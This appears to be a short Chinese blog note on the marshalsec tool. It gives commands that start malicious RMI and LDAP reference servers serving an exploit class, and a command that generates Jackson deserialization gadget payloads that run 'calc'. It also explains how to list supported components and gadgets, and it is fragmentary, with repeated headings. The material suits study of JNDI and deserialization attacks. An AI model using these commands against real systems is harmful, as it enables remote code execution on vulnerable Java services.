# marshalsec使用

开启rmi服务,恶意类放到服务上

D:\jdk_1.8\bin\java.exe -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://127.0.0.1/css/#ExportObject 1099

开启ldap服务

D:\jdk_1.8\bin\java.exe -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1/css/#ExportObject 1389

参考链接
列出所有jackson的gadgets传参为calc

D:\jdk_1.8\bin\java.exe -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson -a exploit.exec="calc"

# marshalsec使用
所有支持的组件
# marshalsec使用
所有支持的gadgets
# marshalsec使用
# marshalsec使用
如果想查找组件可以生成的gadgets有哪些
以Jackson为例

D:\jdk_1.8\bin\java.exe -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson

# marshalsec使用
如果想查找gadgets可以用于哪些组件生成
1、以resin为例,可以查看手册
# marshalsec使用
2、选择想看的gadgets->find usages
# marshalsec使用
参考链接

上一篇:Kubernetes进阶实战读书笔记:网络存储


下一篇:七、配置前提(4)